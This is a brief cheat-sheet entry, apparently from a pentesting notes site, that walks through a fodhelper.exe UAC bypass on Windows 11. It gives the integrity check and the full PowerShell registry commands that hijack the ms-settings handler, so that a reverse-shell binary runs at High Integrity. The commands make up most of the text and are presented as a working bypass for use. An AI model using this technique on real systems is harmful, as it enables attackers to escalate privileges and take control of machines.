Fodhelper.exe

Check integrity of current shell

whoami /groups

Mandatory Label\Medium Mandatory Level

(not High Mandatory Level)

Working Bypass

Works as of 04/06/2023 on Windows 11 Enterprise 22621.ni_release.220506-1250

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Users\User\ConsoleApp1.exe" -Force
fodhelper.exe

(ConsoleApp1.exe is your reverse shell binary)

We are abusing Fodhelper's auto-elevate (that is set to True by default), we make it execute our binary in High Integrity, thus bypassing UAC.

Last updated 2 years ago